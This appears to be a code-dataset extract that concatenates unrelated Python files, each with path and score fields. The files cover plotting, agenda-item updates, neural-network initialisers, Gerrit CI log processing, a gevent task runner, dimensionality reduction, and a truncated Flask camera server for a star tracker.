ax.xaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.yaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="both")
#ax.set_xlim(self.xmin, self.xmax)
#ax.set_ylim(self.ymin, self.ymax)
# グリッド
ax.grid(zorder=0)
# 凡例の表示
#ax.legend(loc='upper right') # locで場所の固定
# グラフの保存
plt.savefig(self.workdir + '/' + self.name + '.png', format='png', dpi=600, bbox_inches="tight", pad_inches=0.05)
# グラフの表示
plt.show()
#クラス設定 ※ScalarFormatterを継承
class FixedOrderFormatter(ScalarFormatter):
def __init__(self, order_of_mag=0, useOffset=True, useMathText=True):
self._order_of_mag = order_of_mag
ScalarFormatter.__init__(self, useOffset=useOffset,
useMathText=useMathText)
def _set_orderOfMagnitude(self, range):
self.orderOfMagnitude = self._order_of_mag | 0.438304 | 0.464416 |
from typing import Optional
from ....models.models import AgendaItem
from ....services.datastore.commands import GetManyRequest
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionPayload
@register_action("agenda_item.update")
class AgendaItemUpdate(UpdateAction):
"""
Action to update agenda items.
"""
model = AgendaItem()
schema = DefaultSchema(AgendaItem()).get_update_schema(
optional_properties=[
"item_number",
"comment",
"closed",
"type",
"weight",
"tag_ids",
"duration",
]
)
def calc_is_internal(
self, type_: Optional[int], parent_is_internal: Optional[bool]
) -> bool:
return type_ == AgendaItem.INTERNAL_ITEM or bool(parent_is_internal)
def calc_is_hidden(
self, type_: Optional[int], parent_is_hidden: Optional[bool]
) -> bool:
return type_ == AgendaItem.HIDDEN_ITEM or bool(parent_is_hidden)
def handle_children(
self, id_: int, parent_is_hidden: bool, parent_is_internal: bool
) -> ActionPayload:
instances = []
agenda_item = self.datastore.get(
FullQualifiedId(self.model.collection, id_), ["child_ids"]
)
if agenda_item.get("child_ids"):
get_many_request = GetManyRequest(
self.model.collection,
agenda_item["child_ids"],
["type", "is_hidden", "is_internal"],
)
gm_result = self.datastore.get_many([get_many_request])
children = gm_result.get(self.model.collection, {})
for child_id in children:
child_ai = children[child_id]
instance = dict()
instance["id"] = child_id
instance["is_hidden"] = self.calc_is_hidden(
child_ai.get("type"), parent_is_hidden
)
instance["is_internal"] = self.calc_is_internal(
child_ai.get("type"), parent_is_internal
)
if (
child_ai.get("is_hidden") == instance["is_hidden"]
and child_ai.get("is_internal") == instance["is_internal"]
):
continue
instances.append(instance)
instances.extend(
self.handle_children(
child_id,
bool(instance["is_hidden"]),
bool(instance["is_internal"]),
)
)
return instances
def get_updated_instances(self, payload: ActionPayload) -> ActionPayload:
new_instances = []
agenda_item_ids = [instance["id"] for instance in payload]
get_many_request = GetManyRequest(
self.model.collection, agenda_item_ids, ["parent_id"]
)
gm_result = self.datastore.get_many([get_many_request])
agenda_items = gm_result.get(self.model.collection, {})
for instance in payload:
if instance.get("type") is None:
new_instances.append(instance)
continue
agenda_item = agenda_items[instance["id"]]
if agenda_item.get("parent_id"):
parent_ai = self.datastore.get(
FullQualifiedId(self.model.collection, agenda_item["parent_id"]),
["is_hidden", "is_internal"],
)
else:
parent_ai = {"is_hidden": False, "is_internal": False}
instance["is_hidden"] = self.calc_is_hidden(
instance["type"], parent_ai.get("is_hidden")
)
instance["is_internal"] = self.calc_is_internal(
instance["type"], parent_ai.get("is_internal")
)
new_instances.append(instance)
new_instances.extend(
self.handle_children(
instance["id"], instance["is_hidden"], instance["is_internal"]
)
)
return new_instances | openslides_backend/action/actions/agenda_item/update.py | from typing import Optional
from ....models.models import AgendaItem
from ....services.datastore.commands import GetManyRequest
from ....shared.patterns import FullQualifiedId
from ...generics.update import UpdateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionPayload
@register_action("agenda_item.update")
class AgendaItemUpdate(UpdateAction):
"""
Action to update agenda items.
"""
model = AgendaItem()
schema = DefaultSchema(AgendaItem()).get_update_schema(
optional_properties=[
"item_number",
"comment",
"closed",
"type",
"weight",
"tag_ids",
"duration",
]
)
def calc_is_internal(
self, type_: Optional[int], parent_is_internal: Optional[bool]
) -> bool:
return type_ == AgendaItem.INTERNAL_ITEM or bool(parent_is_internal)
def calc_is_hidden(
self, type_: Optional[int], parent_is_hidden: Optional[bool]
) -> bool:
return type_ == AgendaItem.HIDDEN_ITEM or bool(parent_is_hidden)
def handle_children(
self, id_: int, parent_is_hidden: bool, parent_is_internal: bool
) -> ActionPayload:
instances = []
agenda_item = self.datastore.get(
FullQualifiedId(self.model.collection, id_), ["child_ids"]
)
if agenda_item.get("child_ids"):
get_many_request = GetManyRequest(
self.model.collection,
agenda_item["child_ids"],
["type", "is_hidden", "is_internal"],
)
gm_result = self.datastore.get_many([get_many_request])
children = gm_result.get(self.model.collection, {})
for child_id in children:
child_ai = children[child_id]
instance = dict()
instance["id"] = child_id
instance["is_hidden"] = self.calc_is_hidden(
child_ai.get("type"), parent_is_hidden
)
instance["is_internal"] = self.calc_is_internal(
child_ai.get("type"), parent_is_internal
)
if (
child_ai.get("is_hidden") == instance["is_hidden"]
and child_ai.get("is_internal") == instance["is_internal"]
):
continue
instances.append(instance)
instances.extend(
self.handle_children(
child_id,
bool(instance["is_hidden"]),
bool(instance["is_internal"]),
)
)
return instances
def get_updated_instances(self, payload: ActionPayload) -> ActionPayload:
new_instances = []
agenda_item_ids = [instance["id"] for instance in payload]
get_many_request = GetManyRequest(
self.model.collection, agenda_item_ids, ["parent_id"]
)
gm_result = self.datastore.get_many([get_many_request])
agenda_items = gm_result.get(self.model.collection, {})
for instance in payload:
if instance.get("type") is None:
new_instances.append(instance)
continue
agenda_item = agenda_items[instance["id"]]
if agenda_item.get("parent_id"):
parent_ai = self.datastore.get(
FullQualifiedId(self.model.collection, agenda_item["parent_id"]),
["is_hidden", "is_internal"],
)
else:
parent_ai = {"is_hidden": False, "is_internal": False}
instance["is_hidden"] = self.calc_is_hidden(
instance["type"], parent_ai.get("is_hidden")
)
instance["is_internal"] = self.calc_is_internal(
instance["type"], parent_ai.get("is_internal")
)
new_instances.append(instance)
new_instances.extend(
self.handle_children(
instance["id"], instance["is_hidden"], instance["is_internal"]
)
)
return new_instances | 0.744471 | 0.218273 |
import os
import numpy as np
from time import time
import joblib
import theano
import theano.tensor as T
from foxhound.theano_utils import sharedX, floatX, intX
from foxhound.rng import np_rng
class W2VEmbedding(object):
def __init__(self, data_dir):
self.data_dir = data_dir
def __call__(self, vocab, name=None):
t = time()
w2v_vocab = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn_vocab.jl'))
w2v_embed = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn.jl'))
mapping = {}
for i, w in enumerate(w2v_vocab):
w = w.lower()
if w in mapping:
mapping[w].append(i)
else:
mapping[w] = [i]
widxs = []
w2vidxs = []
for i, w in enumerate(vocab):
w = w.replace('`', "'")
if w in mapping:
w2vi = min(mapping[w])
w2vidxs.append(w2vi)
widxs.append(i)
w = np.zeros((len(vocab), w2v_embed.shape[1]))
w[widxs, :] = w2v_embed[w2vidxs, :]/2.
return sharedX(w, name=name)
class Uniform(object):
def __init__(self, scale=0.05):
self.scale = 0.05
def __call__(self, shape):
return sharedX(np_rng.uniform(low=-self.scale, high=self.scale, size=shape))
class Normal(object):
def __init__(self, loc=0., scale=0.05):
self.scale = scale
self.loc = loc
def __call__(self, shape, name=None):
return sharedX(np_rng.normal(loc=self.loc, scale=self.scale, size=shape), name=name)
class Orthogonal(object):
""" benanne lasagne ortho init (faster than qr approach)"""
def __init__(self, scale=1.1):
self.scale = scale
def __call__(self, shape, name=None):
flat_shape = (shape[0], np.prod(shape[1:]))
a = np_rng.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return sharedX(self.scale * q[:shape[0], :shape[1]], name=name)
class Frob(object):
def __init__(self):
pass
def __call__(self, shape, name=None):
r = np_rng.normal(loc=0, scale=0.01, size=shape)
r = r/np.sqrt(np.sum(r**2))*np.sqrt(shape[1])
return sharedX(r, name=name)
class Constant(object):
def __init__(self, c=0.):
self.c = c
def __call__(self, shape):
return sharedX(np.ones(shape) * self.c)
class Identity(object):
def __init__(self, scale=0.25):
self.scale = scale
def __call__(self, shape):
return sharedX(np.identity(shape[0]) * self.scale)
class ReluInit(object):
def __init__(self):
pass
def __call__(self, shape):
if len(shape) == 2:
scale = np.sqrt(2./shape[0])
elif len(shape) == 4:
scale = np.sqrt(2./np.prod(shape[1:]))
else:
raise NotImplementedError
return sharedX(np_rng.normal(size=shape, scale=scale)) | foxhound/inits.py | import os
import numpy as np
from time import time
import joblib
import theano
import theano.tensor as T
from foxhound.theano_utils import sharedX, floatX, intX
from foxhound.rng import np_rng
class W2VEmbedding(object):
def __init__(self, data_dir):
self.data_dir = data_dir
def __call__(self, vocab, name=None):
t = time()
w2v_vocab = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn_vocab.jl'))
w2v_embed = joblib.load(os.path.join(self.data_dir, '3m_w2v_gn.jl'))
mapping = {}
for i, w in enumerate(w2v_vocab):
w = w.lower()
if w in mapping:
mapping[w].append(i)
else:
mapping[w] = [i]
widxs = []
w2vidxs = []
for i, w in enumerate(vocab):
w = w.replace('`', "'")
if w in mapping:
w2vi = min(mapping[w])
w2vidxs.append(w2vi)
widxs.append(i)
w = np.zeros((len(vocab), w2v_embed.shape[1]))
w[widxs, :] = w2v_embed[w2vidxs, :]/2.
return sharedX(w, name=name)
class Uniform(object):
def __init__(self, scale=0.05):
self.scale = 0.05
def __call__(self, shape):
return sharedX(np_rng.uniform(low=-self.scale, high=self.scale, size=shape))
class Normal(object):
def __init__(self, loc=0., scale=0.05):
self.scale = scale
self.loc = loc
def __call__(self, shape, name=None):
return sharedX(np_rng.normal(loc=self.loc, scale=self.scale, size=shape), name=name)
class Orthogonal(object):
""" benanne lasagne ortho init (faster than qr approach)"""
def __init__(self, scale=1.1):
self.scale = scale
def __call__(self, shape, name=None):
flat_shape = (shape[0], np.prod(shape[1:]))
a = np_rng.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return sharedX(self.scale * q[:shape[0], :shape[1]], name=name)
class Frob(object):
def __init__(self):
pass
def __call__(self, shape, name=None):
r = np_rng.normal(loc=0, scale=0.01, size=shape)
r = r/np.sqrt(np.sum(r**2))*np.sqrt(shape[1])
return sharedX(r, name=name)
class Constant(object):
def __init__(self, c=0.):
self.c = c
def __call__(self, shape):
return sharedX(np.ones(shape) * self.c)
class Identity(object):
def __init__(self, scale=0.25):
self.scale = scale
def __call__(self, shape):
return sharedX(np.identity(shape[0]) * self.scale)
class ReluInit(object):
def __init__(self):
pass
def __call__(self, shape):
if len(shape) == 2:
scale = np.sqrt(2./shape[0])
elif len(shape) == 4:
scale = np.sqrt(2./np.prod(shape[1:]))
else:
raise NotImplementedError
return sharedX(np_rng.normal(size=shape, scale=scale)) | 0.535827 | 0.168207 |
import re
import memcache
from oslo.config import cfg
from six.moves.urllib import parse
from driverlog.openstack.common import log as logging
from driverlog.processor import config
from driverlog.processor import rcs
from driverlog.processor import utils
LOG = logging.getLogger(__name__)
def update_generator(memcached, default_data, ci_ids_map, force_update=False):
for project in default_data['projects']:
project_id = project['id']
rcs_inst = rcs.get_rcs(project_id, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
LOG.debug('Processing reviews for project: %s', project_id)
rcs_key = 'rcs:' + parse.quote_plus(project_id)
last_id = None
if not force_update:
last_id = memcached.get(rcs_key)
review_iterator = rcs_inst.log(last_id)
branch_ci_set = set()
for review in review_iterator:
review_url = review['url']
branch = review['branch']
for approval in review['currentPatchSet']['approvals']:
if approval['type'] != 'VRIF':
continue
ci = approval['by']['username']
if ci not in ci_ids_map:
continue
branch_ci = (branch, ci)
if branch_ci in branch_ci_set:
continue # already seen, ignore
branch_ci_set.add(branch_ci)
patch_number = review['currentPatchSet']['number']
message = ''
for comment in reversed(review['comments']):
prefix = 'Patch Set %s:' % patch_number
if ((comment['reviewer']['username'] == ci) and
(comment['message'].find(prefix) == 0)):
message = comment['message'][len(prefix):].strip()
break
success = approval['value'] in ['1', '2']
vendor = ci_ids_map[ci][0]
driver_name = ci_ids_map[ci][1]
yield {
(project_id.lower(), vendor.lower(),
driver_name.lower()): {
'os_versions_map': {
branch: {
'project_id': project_id,
'vendor': vendor,
'name': driver_name,
'verification': 'external_ci_verification',
'success': success,
'comment': message,
'timestamp': approval['grantedOn'],
'review_url': review_url
}
}
}
}
last_id = rcs_inst.get_last_id()
LOG.debug('RCS last id is: %s', last_id)
memcached.set(rcs_key, last_id)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('driverlog')
LOG.info('Logging enabled')
MEMCACHED_URI_PREFIX = r'^memcached:\/\/'
stripped = re.sub(MEMCACHED_URI_PREFIX, '', cfg.CONF.runtime_storage_uri)
if not stripped:
exit(1)
memcached_uri = stripped.split(',')
memcached = memcache.Client(memcached_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
return not 0
ci_ids_map = {}
for driver in default_data['drivers']:
vendor = driver['vendor']
driver_name = driver['name']
for os_version in driver['os_versions']:
if os_version['verification'] == 'external_ci_verification':
ci_id = os_version['ci_id']
ci_ids_map[ci_id] = (vendor, driver_name)
persisted_data = {}
if not cfg.CONF.force_update:
persisted_data = memcached.get('driverlog:update') or {}
for record in update_generator(memcached, default_data, ci_ids_map,
force_update=cfg.CONF.force_update):
LOG.info('Got new record from Gerrit: %s', record)
key = record.keys()[0]
if key not in persisted_data:
persisted_data.update(record)
else:
persisted_os_versions = persisted_data[key]['os_versions_map']
for os_version, info in record[key]['os_versions_map'].iteritems():
if os_version not in persisted_os_versions:
persisted_os_versions[os_version] = info
else:
persisted_os_versions[os_version].update(info)
memcached.set('driverlog:update', persisted_data)
if __name__ == '__main__':
main() | driverlog/processor/main.py |
import re
import memcache
from oslo.config import cfg
from six.moves.urllib import parse
from driverlog.openstack.common import log as logging
from driverlog.processor import config
from driverlog.processor import rcs
from driverlog.processor import utils
LOG = logging.getLogger(__name__)
def update_generator(memcached, default_data, ci_ids_map, force_update=False):
for project in default_data['projects']:
project_id = project['id']
rcs_inst = rcs.get_rcs(project_id, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
LOG.debug('Processing reviews for project: %s', project_id)
rcs_key = 'rcs:' + parse.quote_plus(project_id)
last_id = None
if not force_update:
last_id = memcached.get(rcs_key)
review_iterator = rcs_inst.log(last_id)
branch_ci_set = set()
for review in review_iterator:
review_url = review['url']
branch = review['branch']
for approval in review['currentPatchSet']['approvals']:
if approval['type'] != 'VRIF':
continue
ci = approval['by']['username']
if ci not in ci_ids_map:
continue
branch_ci = (branch, ci)
if branch_ci in branch_ci_set:
continue # already seen, ignore
branch_ci_set.add(branch_ci)
patch_number = review['currentPatchSet']['number']
message = ''
for comment in reversed(review['comments']):
prefix = 'Patch Set %s:' % patch_number
if ((comment['reviewer']['username'] == ci) and
(comment['message'].find(prefix) == 0)):
message = comment['message'][len(prefix):].strip()
break
success = approval['value'] in ['1', '2']
vendor = ci_ids_map[ci][0]
driver_name = ci_ids_map[ci][1]
yield {
(project_id.lower(), vendor.lower(),
driver_name.lower()): {
'os_versions_map': {
branch: {
'project_id': project_id,
'vendor': vendor,
'name': driver_name,
'verification': 'external_ci_verification',
'success': success,
'comment': message,
'timestamp': approval['grantedOn'],
'review_url': review_url
}
}
}
}
last_id = rcs_inst.get_last_id()
LOG.debug('RCS last id is: %s', last_id)
memcached.set(rcs_key, last_id)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('driverlog')
LOG.info('Logging enabled')
MEMCACHED_URI_PREFIX = r'^memcached:\/\/'
stripped = re.sub(MEMCACHED_URI_PREFIX, '', cfg.CONF.runtime_storage_uri)
if not stripped:
exit(1)
memcached_uri = stripped.split(',')
memcached = memcache.Client(memcached_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
return not 0
ci_ids_map = {}
for driver in default_data['drivers']:
vendor = driver['vendor']
driver_name = driver['name']
for os_version in driver['os_versions']:
if os_version['verification'] == 'external_ci_verification':
ci_id = os_version['ci_id']
ci_ids_map[ci_id] = (vendor, driver_name)
persisted_data = {}
if not cfg.CONF.force_update:
persisted_data = memcached.get('driverlog:update') or {}
for record in update_generator(memcached, default_data, ci_ids_map,
force_update=cfg.CONF.force_update):
LOG.info('Got new record from Gerrit: %s', record)
key = record.keys()[0]
if key not in persisted_data:
persisted_data.update(record)
else:
persisted_os_versions = persisted_data[key]['os_versions_map']
for os_version, info in record[key]['os_versions_map'].iteritems():
if os_version not in persisted_os_versions:
persisted_os_versions[os_version] = info
else:
persisted_os_versions[os_version].update(info)
memcached.set('driverlog:update', persisted_data)
if __name__ == '__main__':
main() | 0.207295 | 0.063978 |
# __author__ = 'kute'
# __mtime__ = '2016/12/24 20:45'
"""
多线程,协称 执行器
"""
import os
import attr
import gevent
from gevent import monkey
from gevent.pool import Pool
monkey.patch_all()
def valide_func(instance, attribute, value):
if not callable(value):
raise TypeError("{} is not callable")
@attr.s
class Eventor(object):
func = attr.ib(validator=valide_func)
taskunitcount = attr.ib(default=100, convert=int)
threadcount = attr.ib(default=os.cpu_count() * 5, convert=int)
interval = attr.ib(default=0, convert=int)
def _slice_list_by_size(self, tasklist, slicesize):
"""按指定大小分隔集合
"""
size = len(tasklist)
if size <= slicesize:
yield tasklist
else:
for i in list(range(0, size // slicesize + 1)):
posi = i * slicesize
templist = tasklist[posi: posi + slicesize]
if len(templist) > 0:
yield templist
def _run(self, pool, tasklist, async=False):
if async:
return pool.map_async(self.func, tasklist)
else:
return pool.map(self.func, tasklist)
def run_with_tasklist(self, tasklist=None, async=False, timeout=None):
if not tasklist or len(tasklist) == 0:
raise ValueError("parameters tasklist null value")
if not isinstance(tasklist, list):
raise ValueError("parameters tasklist wrong type, should be list, not {}".format(tasklist.__class__.__name__))
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
size = len(tasklist)
total = 0
resultlist = []
if size <= taskunitcount:
result = self._run(pool, tasklist, async)
resultlist.extend(result.get(timeout) if async else result)
print("finished {} total tasks".format(size))
else:
for slicelist in self._slice_list_by_size(tasklist, taskunitcount):
result = self._run(pool, slicelist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(slicelist)
gevent.sleep(self.interval)
print("finished {} total tasks".format(total))
pool.join()
return resultlist
def run_with_file(self, file=None, async=False, timeout=None):
if not os.path.exists(file) or not os.path.isfile(file):
raise ValueError("wrong file or not exists")
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
plist = []
total = 0
resultlist = []
with open(file, "r") as f:
for line in f:
plist.append(line.strip())
if len(plist) >= taskunitcount:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
gevent.sleep(self.interval)
if len(plist) > 0:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
print("finished {} total tasks".format(total))
pool.join()
return resultlist | eventor/core.py |
# __author__ = 'kute'
# __mtime__ = '2016/12/24 20:45'
"""
多线程,协称 执行器
"""
import os
import attr
import gevent
from gevent import monkey
from gevent.pool import Pool
monkey.patch_all()
def valide_func(instance, attribute, value):
if not callable(value):
raise TypeError("{} is not callable")
@attr.s
class Eventor(object):
func = attr.ib(validator=valide_func)
taskunitcount = attr.ib(default=100, convert=int)
threadcount = attr.ib(default=os.cpu_count() * 5, convert=int)
interval = attr.ib(default=0, convert=int)
def _slice_list_by_size(self, tasklist, slicesize):
"""按指定大小分隔集合
"""
size = len(tasklist)
if size <= slicesize:
yield tasklist
else:
for i in list(range(0, size // slicesize + 1)):
posi = i * slicesize
templist = tasklist[posi: posi + slicesize]
if len(templist) > 0:
yield templist
def _run(self, pool, tasklist, async=False):
if async:
return pool.map_async(self.func, tasklist)
else:
return pool.map(self.func, tasklist)
def run_with_tasklist(self, tasklist=None, async=False, timeout=None):
if not tasklist or len(tasklist) == 0:
raise ValueError("parameters tasklist null value")
if not isinstance(tasklist, list):
raise ValueError("parameters tasklist wrong type, should be list, not {}".format(tasklist.__class__.__name__))
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
size = len(tasklist)
total = 0
resultlist = []
if size <= taskunitcount:
result = self._run(pool, tasklist, async)
resultlist.extend(result.get(timeout) if async else result)
print("finished {} total tasks".format(size))
else:
for slicelist in self._slice_list_by_size(tasklist, taskunitcount):
result = self._run(pool, slicelist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(slicelist)
gevent.sleep(self.interval)
print("finished {} total tasks".format(total))
pool.join()
return resultlist
def run_with_file(self, file=None, async=False, timeout=None):
if not os.path.exists(file) or not os.path.isfile(file):
raise ValueError("wrong file or not exists")
if not callable(self.func):
raise ValueError("func is illegal function")
if async and timeout is None:
raise ValueError("timeout should be seted if special async=True")
threadcount = self.threadcount or os.cpu_count() * 5
taskunitcount = self.taskunitcount or 100
pool = Pool(threadcount)
plist = []
total = 0
resultlist = []
with open(file, "r") as f:
for line in f:
plist.append(line.strip())
if len(plist) >= taskunitcount:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
gevent.sleep(self.interval)
if len(plist) > 0:
result = self._run(pool, plist, async)
resultlist.extend(result.get(timeout) if async else result)
total += len(plist)
plist.clear()
print("finished {} total tasks".format(total))
pool.join()
return resultlist | 0.242385 | 0.075824 |
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA, KernelPCA
from umap import UMAP
import numpy as np
import pandas as pd
import phate
def dimensionality_reduction(data: pd.DataFrame,
features: list,
method: str,
n_components: int,
return_embeddings_only: bool = False,
return_reducer: bool = False,
**kwargs) -> pd.DataFrame or np.array:
"""
Perform dimensionality reduction using either UMAP, PCA, tSNE, or PHATE. PCA and tSNE are implemented using
the Scikit-Learn machine learning library.
Documentation for UMAP can be found here: https://umap-learn.readthedocs.io/en/latest/
Documentation for PHATE can be found here: https://phate.readthedocs.io/en/stable/
Parameters
-----------
data: Pandas.DataFrame
Events to perform dim reduction on
features: list
column names for feature space
method: str
method to use; either UMAP, PCA, tSNE, or PHATE
n_components: int
number of components to generate
return_embeddings_only: bool, (default=True)
if True, the embeddings are returned as a numpy array, otherwise original dataframe
is returned modified with new columns, one for each embedding (column name of format {Method}_{i}
where i = 0 to n_components)
return_reducer: bool, (default=False)
If True, returns instance of dimensionality reduction object
kwargs:
keyword arguments to pass to chosen dim reduction method
Returns
--------
(Pandas.DataFrame or Numpy.array) or (Pandas.DataFrame or Numpy.array, Reducer)
Embeddings as numpy array or original DataFrame with new columns for embeddings
"""
data = data.copy()
if method == 'UMAP':
reducer = UMAP(random_state=42, n_components=n_components, **kwargs)
elif method == 'PCA':
reducer = PCA(random_state=42, n_components=n_components, **kwargs)
elif method == 'tSNE':
reducer = TSNE(random_state=42, n_components=n_components, **kwargs)
elif method == 'PHATE':
reducer = phate.PHATE(random_state=42, n_jobs=-2, n_components=n_components, **kwargs)
elif method == 'KernelPCA':
reducer = KernelPCA(random_state=42, n_components=n_components, **kwargs)
else:
raise ValueError("Error: invalid method given for plot clusters, "
"must be one of: 'UMAP', 'tSNE', 'PCA', 'PHATE', 'KernelPCA'")
embeddings = reducer.fit_transform(data[features])
if return_embeddings_only:
return embeddings
for i, e in enumerate(embeddings.T):
data[f'{method}_{i}'] = e
if return_reducer:
return data, reducer
return data | CytoPy/flow/dim_reduction.py | from sklearn.manifold import TSNE
from sklearn.decomposition import PCA, KernelPCA
from umap import UMAP
import numpy as np
import pandas as pd
import phate
def dimensionality_reduction(data: pd.DataFrame,
features: list,
method: str,
n_components: int,
return_embeddings_only: bool = False,
return_reducer: bool = False,
**kwargs) -> pd.DataFrame or np.array:
"""
Perform dimensionality reduction using either UMAP, PCA, tSNE, or PHATE. PCA and tSNE are implemented using
the Scikit-Learn machine learning library.
Documentation for UMAP can be found here: https://umap-learn.readthedocs.io/en/latest/
Documentation for PHATE can be found here: https://phate.readthedocs.io/en/stable/
Parameters
-----------
data: Pandas.DataFrame
Events to perform dim reduction on
features: list
column names for feature space
method: str
method to use; either UMAP, PCA, tSNE, or PHATE
n_components: int
number of components to generate
return_embeddings_only: bool, (default=True)
if True, the embeddings are returned as a numpy array, otherwise original dataframe
is returned modified with new columns, one for each embedding (column name of format {Method}_{i}
where i = 0 to n_components)
return_reducer: bool, (default=False)
If True, returns instance of dimensionality reduction object
kwargs:
keyword arguments to pass to chosen dim reduction method
Returns
--------
(Pandas.DataFrame or Numpy.array) or (Pandas.DataFrame or Numpy.array, Reducer)
Embeddings as numpy array or original DataFrame with new columns for embeddings
"""
data = data.copy()
if method == 'UMAP':
reducer = UMAP(random_state=42, n_components=n_components, **kwargs)
elif method == 'PCA':
reducer = PCA(random_state=42, n_components=n_components, **kwargs)
elif method == 'tSNE':
reducer = TSNE(random_state=42, n_components=n_components, **kwargs)
elif method == 'PHATE':
reducer = phate.PHATE(random_state=42, n_jobs=-2, n_components=n_components, **kwargs)
elif method == 'KernelPCA':
reducer = KernelPCA(random_state=42, n_components=n_components, **kwargs)
else:
raise ValueError("Error: invalid method given for plot clusters, "
"must be one of: 'UMAP', 'tSNE', 'PCA', 'PHATE', 'KernelPCA'")
embeddings = reducer.fit_transform(data[features])
if return_embeddings_only:
return embeddings
for i, e in enumerate(embeddings.T):
data[f'{method}_{i}'] = e
if return_reducer:
return data, reducer
return data | 0.941995 | 0.465813 |
import base64
import time
import zipfile
import os
import uuid
import logging
from io import BytesIO
from pathlib import Path
import cv2
from flask import render_template, jsonify, request, send_file
from server import app, catalog
from server.cam import Cam
from server.metrics import Metrics
from server.sensors import DS1621, LSM303, CPU_SENSOR
from server.db import Db
from server.startracker.image import ImageUtils
CAM = Cam()
# Current file Path
FILE_PATH = Path(__file__).parent.absolute()
DB = Db(f"{FILE_PATH}/data/startrackerpy.db")
@app.route("/")
def index():
""" Returns the index html template
"""
return render_template('index.html')
@app.route("/current-frame")
def current_frame():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
images_path = f"{FILE_PATH}/data/images"
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
time.sleep(1)
_, frame = CAM.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
CAM.lock_release()
Path(images_path).mkdir(parents=True, exist_ok=True)
uid = uuid.uuid1()
_, im_arr = cv2.imencode('.jpg', frame)
cv2.imwrite(f"{images_path}/{uid}.jpg", frame)
im_bytes = im_arr.tobytes()
im_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': im_b64,
'uuid': f"{uid}.jpg",
})
@app.route("/current-frame-tiff")
def current_frame_tiff():
""" Returns a base64 string with the data of an image.
The image is taken when the function is called.
"""
# Get camera parameters
cam_params = {
'brightness': int(request.args.get('brightness')),
'gamma': int(request.args.get('gamma')),
'gain': int(request.args.get('gain')),
'exposure': int(request.args.get('exposure')),
}
CAM.lock_acquire()
CAM.set_camera_params(cam_params)
# Give some time to set the camera parameters
time.sleep(1.5)
_, frame = CAM.read()
cv2.imwrite('test.tiff', frame)
CAM.lock_release()
return "Done"
@app.route("/get-camera-params")
def get_camera_params():
""" Returns a JSON with the current parameters of the camera.
"""
params = CAM.get_camera_params()
return jsonify(params)
@app.route("/get-metrics/<minutes>")
def get_metrics(minutes):
""" Returns metrics from influxdb for the last
X minutes.
"""
metrics = Metrics.get_metrics(from_time=int(minutes))
return jsonify(metrics)
@app.route("/queue-burst")
def queue_burst():
""" Queues a burst of images.
"""
duration = request.args.get('duration')
interval = request.args.get('interval')
brightness = int(request.args.get('brightness'))
gamma = int(request.args.get('gamma'))
gain = int(request.args.get('gain'))
exposure = int(request.args.get('exposure'))
if int(duration) / int(interval) > 600:
return jsonify({
'result': 'error',
'id': -1,
'msg': 'Maximum numer of frames(600) exceeded'
})
# Add a row to queue the burst
row_id = DB.insert_burst(duration, interval, brightness, gamma,
gain, exposure)
return jsonify({
'result': 'ok',
'id': row_id,
'msg': 'The burst has been queued'
})
@app.route("/get-bursts")
def get_bursts():
"""Returns an html table with the burst retrieved from the DB.
"""
bursts = DB.get_bursts()
return render_template('bursts.html', bursts=bursts)
@app.route("/download-burst")
def download_burst():
"""Returns an html table with the burst retrieved from the DB.
"""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst_format = request.args.get('format')
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
